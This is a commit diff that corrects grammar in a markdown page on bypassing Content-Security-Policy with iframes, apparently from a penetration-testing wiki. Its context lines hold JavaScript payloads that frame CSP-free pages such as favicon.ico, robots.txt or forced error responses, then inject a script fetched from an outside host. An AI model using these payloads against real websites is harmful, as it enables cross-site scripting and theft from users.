Update csp-bypass-self-+-unsafe-inline-with-iframes.md
This commit is contained in:
parent
0083ed7909
commit
450d0b4463
|
@ -25,15 +25,15 @@ Content-Security-Policy: default-src ‘self’ ‘unsafe-inline’;
|
|||
|
||||
Prohibits usage of any functions that execute code transmitted as a string. For example: `eval, setTimeout, setInterval` will all be blocked because of the setting `unsafe-eval`
|
||||
|
||||
Any content from external sources is also blocked, including images, css, websockets, and, especially, JS
|
||||
Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS
|
||||
|
||||
## Via text & images
|
||||
|
||||
Modern browsers transform images and texts o HTML files to visualize them better (set background, center...).
|
||||
Modern browsers transform images and texts into HTML files to visualize them better (set background, center, etc).
|
||||
|
||||
Therefore, if you **open an image or txt file** such as **favicon.ico** or **robots.txt** with an **`iframe`**, you will open it as HTML.
|
||||
|
||||
**These kind of pages usually doesn't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them:
|
||||
**These kinds of pages usually don't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them:
|
||||
|
||||
```javascript
|
||||
frame=document.createElement("iframe");
|
||||
|
@ -46,7 +46,7 @@ window.frames[0].document.head.appendChild(script);
|
|||
|
||||
## Via Errors
|
||||
|
||||
Same as text files or images, **error responses usually doesn't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe:
|
||||
Same as text files or images, **error responses usually don't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe:
|
||||
|
||||
```javascript
|
||||
// Force nginx error
|
||||
|
@ -69,7 +69,7 @@ for(var i=0;i<5;i++){document.cookie=i+"="}
|
|||
```
|
||||
|
||||
```javascript
|
||||
// After any of the previous examples, you can execute JS in the iframe wih something like:
|
||||
// After any of the previous examples, you can execute JS in the iframe with something like:
|
||||
script=document.createElement('script');
|
||||
script.src='//bo0om.ru/csp.js';
|
||||
window.frames[0].document.head.appendChild(script);
|
||||
|
|
Loading…
Reference in New Issue